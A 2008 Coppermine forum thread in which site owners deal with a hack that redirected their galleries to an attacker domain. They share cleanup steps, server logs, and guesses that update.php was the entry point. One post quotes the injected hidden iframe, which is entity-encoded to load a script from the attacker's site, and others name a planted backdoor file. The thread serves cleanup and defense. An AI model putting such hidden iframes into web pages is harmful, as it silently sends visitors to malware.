Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 6 Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 6
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

Started by htgguy, April 06, 2008, 10:04:11 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Joachim Müller

Quote from: Joachim Müller on April 10, 2008, 10:38:22 PMWe can't tell you how to clean your site once it has been hacked - that's beyond the scope of this site.

mentalist3d

After removing all the unwanted code, the offending Zip & Jpg file, I noticed two pics had been added to one of my batch add galleries which I couldn't remove via coppermine, I had to delete the full album. Check your last additions for all your albums, as I noticed my batch album had the original date I uploaded all the files and the last two pics had been added on the day of the attack, the pics will show a thumbnail of another image but cannot show you an enlarged version as it is pointing to the zip file. Follow all the advice on this board then do a double check of all your images to see what file the thumbnail is pointing to, also make sure the dates match when they were uploaded. Hope this helps some of you without getting me a ban :-)

Joachim Müller

The payload of the hack may differ from site to site. Please don't post your (well-meant) suggestions here, as the payload may be totally different on someone else's site.

Joachim Müller

#103
The security fix discussed in this thread has been rolled into a new package - see the announcement thread cpg1.4.17 Security release - upgrade absolutely mandatory!
The new version will not cure sites that are already infected - it will only keep your site from getting infected in the first place. All who are running older versions than cpg1.4.17 need to upgrade instantly.

As suggested in the announcement thread for the release of cpg1.4.17, I'll try to come up with instructions how to clean sites that have already been infected.

Basic procedure (to give you a general idea what you'd need to do):
  • Make a full backup of all files and folders on your webspace
  • Replace all possibly infected files with fresh ones that are guaranteed to be clean (from a fresh package)
  • Scan the files and folders you downloaded for executable files: PHP, Perl files, bash scripts, whatever the user could have left (depending on the skills of the attacker) and delete all of them on your webspace (the tricky part being that you need to really find all backdoors)
  • Browse the database, coppermine's user table. Search for admin accounts. Delete all that you don't know. Change the password of your own admin account
  • Change all seurity-sensitive passwords (for FTP access, website control panel, mySQL) and reflect your changes in the apps you use (changed mySQL account!)
  • Tell your webhost about the attack. Ask them to see the server logs for the period where the attack has happened

Joachim

mr.goose

@ Joachim:- Just wanted to say a big Thank You! to you and your team for fixing this so quickly.

Also wanted to let you know that the cdpuvbhfzz.com server seems no longer to be on-line. My guess its that UkrTeleGroup Ltd must have got a lot of complaints. Of course there's nothing to stop our attacker taking his domain and hosting it else where I suppose. Anyway I have patched both our Coppermine sites and am double-checking the clean-up as per your instructions. I think I shall have a beer now! Suggest you do same.  :)

Best wishes, G.

steveeh131047

And also from me. Can't imagine how you guys cope with tackling a problem like that whilst still answering all the other forum queries.

j_taubman

Thank you  from me to for that rapid response.

One tiny little thing on checking my file levels after upgrading it shows

include/imageObjectGD.class.php   1.4.17   1.4.17   4378   4311

I would guess this is just a minor glitch in the update reference file in the package (my system can not connect to get the master one) ?


j_taubman


Joachim Müller


VoiceOfEvening

Hello Everyone, what a nightmare this redirect has been.

I "believe" I have removed the hack from my gallery, but because I'm not sure how the hacker managed to place the redirect in the first place I'm not 100% sure how effective my method will be.

From what I've discovered it looks like redirect targets any file involved with the user interface, i.e. what someone sees in their browser.  I found the dreaded piece of code:

<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>

1. In my main index.php file
2. All php and html files of my custom theme
3. My config.inc.php and anycontent.php files
4. All the html files within my userpics and edit folders (within the albums folder)
5. The security.log.php file (for some reason)
6. Possibly admin.php as well

My method:

The first thing I did is upgrade to version 1.4.17, backing up my album and config.inc.php and anycontent.php files.  This will overwrite any files infected with the above code which I've overlooked.

Open your config.inc.php and anycontent.php files (for example in notepad) before running the update and delete the nasty bit of code.

Delete the code within the other files mentioned above and run the update.


Others in this thread mentioned they found strange files and jpegs within there galleries, if you find anything untoward - undo/delete it.  I didn't find anything out of place on my webserver.  If you have any non-coppermine pages in your site - check them as they could be infected.  If you're running other websites on the same server check those as well, my wiki site also got infected but I "cured" it in the same way.

If you don't believe me go to skys-edge.co.uk.  At time of writing you won't be redirected, hopefully it will stay that way.

I do hope this is useful.

Tano*87

It happened again! This time is more strong. The more I delete the codes the more it comes back again.

norabdor

Same with me. I spent hours deleting and reloading files throughout my entire website. I changed passwords to FTP  Coppermine admin, checked for unexpected members etc.  I then upgradedd to 1.4.17 as instructed (it went fine)  and low behold, the same thing happened all over again about 12 hours later. It looks like the same type of attack to me with the zip file being placed in a folder named 10001 in the userpics folder. Again all html and php files have the iframe code added. I really thought I had cleaned everything.

mr.goose

@ Joachim:- I followed your instructions to the letter. But my configuration settings have been changed again. I have attached two SQL dumps which show the changes made (I edited out my email address). Happened at 09:00 UTC. As a safety precaution, I am still denying the webserver write-access to any files at the moment, so no files have been altered - which means I can't tell you whether the upload issue is still affecting us or not. However, I studied my logs very carefully...

Quote195.5.117.252 - - [12/Apr/2008:08:57:33 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30405 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:58:37 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 23507 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:58:40 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22292 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:58:45 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22244 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:58:48 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22779 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:57:34 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30405 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:58:51 +0100] "GET /coppermine/?ff=1 HTTP/1.1" 200 26233 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:58:56 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22779 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:59:01 +0100] "GET /coppermine/displayimage.php?album=lastup&cat=0&pos=0 HTTP/1.1" 200 42567 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:08:59:05 +0100] "GET /coppermine/ HTTP/1.1" 200 25783 "-" "User-Agent: Opera/9.27 (Windows NT  5.2; U; ru)"

195.5.117.252 - - [12/Apr/2008:10:04:57 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30405 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:02 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 23507 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:04 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22292 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:07 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22779 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:10 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22244 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:13 +0100] "GET /coppermine/displayimage.php?album=lastup&cat=0&pos=0 HTTP/1.1" 200 42566 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:05:00 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30405 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:15 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 23507 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:18 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22292 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:22 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22779 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:25 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22244 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [12/Apr/2008:10:06:27 +0100] "GET /coppermine/displayimage.php?album=lastup&cat=0&pos=0 HTTP/1.1" 200 42568 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"

I suspect that the 1.4.17 patch only addresses one vulnerability. I think there may be another hack that involves update.php in some way. Note how each attack commences with a GET of update.php. Perhaps it's this that allows the attacker to alter the config settings. Also, I am slightly concerned that that a file that writes such significant changes to my database can be accessed by the world in the first place. Indeed, it seems you can visit any Coppermine-powered site and run their update.php with no permissions at all. Interestingly, the subject of deleting "update.php" was discussed a while ago:- http://coppermine-gallery.net/forum/index.php?topic=34169.0 I may try deleting mine if we are attacked again.

Anyway my site is http://www.garfnet.org.uk/coppermine and my server info is as follows:-

  • Linux 2.6.18-6-686 #1 SMP Sun Feb 10 22:11:31 UTC 2008 i686 GNU/Linux
  • Apache/2.2.3 Server built: Jan 27 2008 18:13:21
  • mysql Ver 14.12 Distrib 5.0.32, for pc-linux-gnu (i486) using readline 5.2
  • PHP 5.2.0-8+etch10 (cli) (built: Jan 18 2008 18:52:58) Zend Engine v2.2.0 with Suhosin v0.9.12
  • Coppermine v1.4.17
,

Best wishes, G

mr.goose

Oops, I forgot to attach the SQL dumps. Sorry.
Best wishes, G

mr.goose

Oh dear! In the time it took me to post that report it seems we've been done again. Same MO. I am going to delete update.php, reload my old cpg_config values from the SQL dump and sit back and wait. I will report back with my findings.
Best wishes. G.

michaeln

Maybe you need to look if the intruder didn't add any scripts to your site. I looked through my log files and found that "zacosmall.php" had been uploaded. It was used to change the files on my site. Upgrading will not help if there is such a script somewhere in your system.

Fab

My gallery was hacked again as well.

To restore it I had asked my host to restore an older backup before upgrading to 1.4.17, so there shouldn't have been any left over of the previous hack, unless the file was injected much earlier and is programmed to run at a specific time.

isajade

Quote from: michaeln on April 12, 2008, 07:51:30 PM
Maybe you need to look if the intruder didn't add any scripts to your site. I looked through my log files and found that "zacosmall.php" had been uploaded. It was used to change the files on my site. Upgrading will not help if there is such a script somewhere in your system.
Check in /plugins/ for this file. (File dated 2007)

mr.goose

I'm concerned about the mechanism that causes data to be written to the cpg_config table without my consent. The two SQL dumps indicate that the attacker is using the custom_header_path field in the cpg_config table in order to include the hacked script. As I see it, the most likely way to do this is is to exploit an existing script designed to write to the cpg_config table, namely update.php. Moreover, I feel that the log activity I posted earlier rather supports this hypothesis.

The encouraging news is that since I removed update.php, my cpg_config table has remained unaltered. But it is early days I suppose and I need to see a few more unsuccessful hack attempts in my Apache2 logs before I can say with any certainty. I'll take another look at my Apache2 logs in a few hours and report back.

Best wishes, G.